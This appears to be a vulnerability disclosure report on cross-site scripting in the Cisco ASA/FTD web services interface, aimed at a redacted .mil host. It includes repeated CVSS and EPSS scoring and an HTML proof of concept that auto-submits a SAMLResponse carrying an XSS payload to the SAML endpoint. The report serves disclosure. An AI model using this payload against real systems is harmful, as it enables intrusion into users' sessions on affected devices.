6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2.6 Low
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:H/Au:N/C:N/I:P/A:N
0.973 High
EPSS
Percentile
99.8%
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device.
Steps To Reproduce
Go to this URL
██████████████.mil.html
HTML POC:
<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=‘https://‘███.mil’/+CSCOE+/saml/sp/acs?tgname=a’ method=‘POST’>
<input type=‘hidden’ name=‘SAMLResponse’ value=‘"><svg/onload=alert(document.cookies)>’/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations.
Supporting Material References
https://www.exploit-db.com/exploits/47988
https://twitter.com/sagaryadav8742/status/1275170967527006208
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2.6 Low
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:H/Au:N/C:N/I:P/A:N
0.973 High
EPSS
Percentile
99.8%